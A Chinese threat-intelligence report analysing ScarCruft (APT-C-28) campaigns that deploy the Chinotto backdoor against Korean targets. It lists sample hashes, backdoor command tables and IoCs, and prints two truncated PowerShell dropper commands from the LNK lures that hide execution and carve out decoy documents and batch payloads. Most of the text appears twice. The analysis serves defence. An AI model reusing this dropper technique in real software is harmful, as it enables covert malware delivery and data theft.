APT-C-28(ScarCruft)组织针对韩国部署Chinotto组件的活动分析
Contents
CoreSec360
360威胁情报中心是全球领先的威胁情报共享、分析和预警平台,依托360安全大脑百亿级样本,万亿级防护日志等海量安全数据,整合360漏洞挖掘、恶意代码分析、威胁情报追踪等团队的安全能力,产出高质量的安全威胁情报,驱动安全的防御、检测和响应。
恶意文件携带的部分诱饵文档如下所示。
MD5
16a34b0e194b3f825a19db5363df4cca
文件大小
24.75MB (25956367字节)
文件类型
ZIP
文件名
REPORT.zip
指令
描述
pcinfo
获取电脑信息
drive
获取磁盘信息
clipboard
获取剪切板数据
svc
获取安装服务列表
process
获取进程列表
fileinfo
上传文件信息
start
启动指定文件
plugin
从远端下载插件执行
down
从远端载文件
up
上传指定文件
regedit
创建注册表
compress
压缩指定文件
MD5
fa03b0248a109a86eaddba108ebfcb14
文件大小
311.11KB (318581字节)
文件类型
RAR
文件名
hanacard_20230610.rar
指令
描述
fileinfo
上传文件信息
dir
收集指定目录下文件并压缩上传
file
上传指定文件
down
从远程下载文件
regedit
创建注册表
task
注册计划任务
zip
解压指定文件
rename
重命名文件
del
删除指定文件
/c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = '%temp%'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0000AB7F4E} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00085268 -ReadCount 00085268; $pdfPath = '%temp%\2023년도 4월 29일세미나.pdf'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002390)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00088506 -ReadCount 00088506; $exePath = '%temp%\230415.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00085268)) -Encoding Byte; ^& $exePath;
/c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = '%temp%'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = '%temp%\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^| select -Skip 62464)) -Encoding Byte; ^& $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount …
360威胁情报中心是全球领先的威胁情报共享、分析和预警平台,依托360安全大脑百亿级样本,万亿级防护日志等海量安全数据,整合360漏洞挖掘、恶意代码分析、威胁情报追踪等团队的安全能力,产出高质量的安全威胁情报,驱动安全的防御、检测和响应。
恶意文件携带的部分诱饵文档如下所示。
MD5
16a34b0e194b3f825a19db5363df4cca
文件大小
24.75MB (25956367字节)
文件类型
ZIP
文件名
REPORT.zip
指令
描述
pcinfo
获取电脑信息
drive
获取磁盘信息
clipboard
获取剪切板数据
svc
获取安装服务列表
process
获取进程列表
fileinfo
上传文件信息
start
启动指定文件
plugin
从远端下载插件执行
down
从远端载文件
up
上传指定文件
regedit
创建注册表
compress
压缩指定文件
MD5
fa03b0248a109a86eaddba108ebfcb14
文件大小
311.11KB (318581字节)
文件类型
RAR
文件名
hanacard_20230610.rar
指令
描述
fileinfo
上传文件信息
dir
收集指定目录下文件并压缩上传
file
上传指定文件
down
从远程下载文件
regedit
创建注册表
task
注册计划任务
zip
解压指定文件
rename
重命名文件
del
删除指定文件
/c powershell -windowstyle hidden $dirPath = Get-Location; if($dirPath -Match 'System32' -or $dirPath -Match 'Program Files') {$dirPath = '%temp%'}; $lnkpath = Get-ChildItem -Path $dirPath -Recurse *.lnk ^| where-object {$_.length -eq 0x0000AB7F4E} ^| Select-Object -ExpandProperty FullName; $pdfFile = gc $lnkpath -Encoding Byte -TotalCount 00085268 -ReadCount 00085268; $pdfPath = '%temp%\2023년도 4월 29일세미나.pdf'; sc $pdfPath ([byte[]]($pdfFile ^| select -Skip 002390)) -Encoding Byte; ^& $pdfPath; $exeFile = gc $lnkpath -Encoding Byte -TotalCount 00088506 -ReadCount 00088506; $exePath = '%temp%\230415.bat'; sc $exePath ([byte[]]($exeFile ^| select -Skip 00085268)) -Encoding Byte; ^& $exePath;
/c powershell -windowstyle hidden $pEbjEn = Get-Location;if($pEbjEn -Match 'System32' -or $pEbjEn -Match 'Program Files') {$pEbjEn = '%temp%'};$lyHWPSj = Get-ChildItem -Path $pEbjEn -Recurse *.lnk ^| where-object {$_.length -eq 0x18C0000} ^| Select-Object -ExpandProperty FullName;if($lyHWPSj.GetType() -Match 'Object'){$lyHWPSj = $lyHWPSj[0];};$lyHWPSj;$C5ytw = gc $lyHWPSj -Encoding Byte -TotalCount 74240 -ReadCount 74240;$tyxkEP = '%temp%\현황조사표.xlsx';sc $tyxkEP ([byte[]]($C5ytw ^| select -Skip 62464)) -Encoding Byte; ^& $tyxkEP;$Cbe1yj = gc $lyHWPSj -Encoding Byte -TotalCount 79888 -ReadCount …
IoC
16a34b0e194b3f825a19db5363df4cca
fa03b0248a109a86eaddba108ebfcb14
fa03b0248a109a86eaddba108ebfcb14